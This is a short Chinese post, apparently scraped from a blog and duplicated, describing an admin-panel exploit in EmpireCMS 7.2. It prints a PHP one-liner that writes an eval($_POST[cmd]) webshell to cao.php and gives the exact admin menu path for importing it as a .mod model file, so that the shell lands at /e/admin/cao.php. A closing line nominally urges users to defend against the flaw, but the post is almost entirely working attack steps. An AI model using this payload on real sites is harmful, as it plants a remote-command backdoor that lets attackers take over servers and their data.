帝国cms7.2后台getshell漏洞
1、php一句话内容:
<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?>
保存为1.php.mod
进入后台---系统设置---管理数据表---管理系统模型---导入新型模块
导入之后马儿就躺在了/e/admin/cao.php。


2、所以大家用帝国cms的要防范这个漏洞,纯属干货分享。
阅读量:29
阅读量:26
阅读量:64
阅读量:47
阅读量:146
1、php一句话内容:
<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?>
保存为1.php.mod
进入后台---系统设置---管理数据表---管理系统模型---导入新型模块
导入之后马儿就躺在了/e/admin/cao.php。


2、所以大家用帝国cms的要防范这个漏洞,纯属干货分享。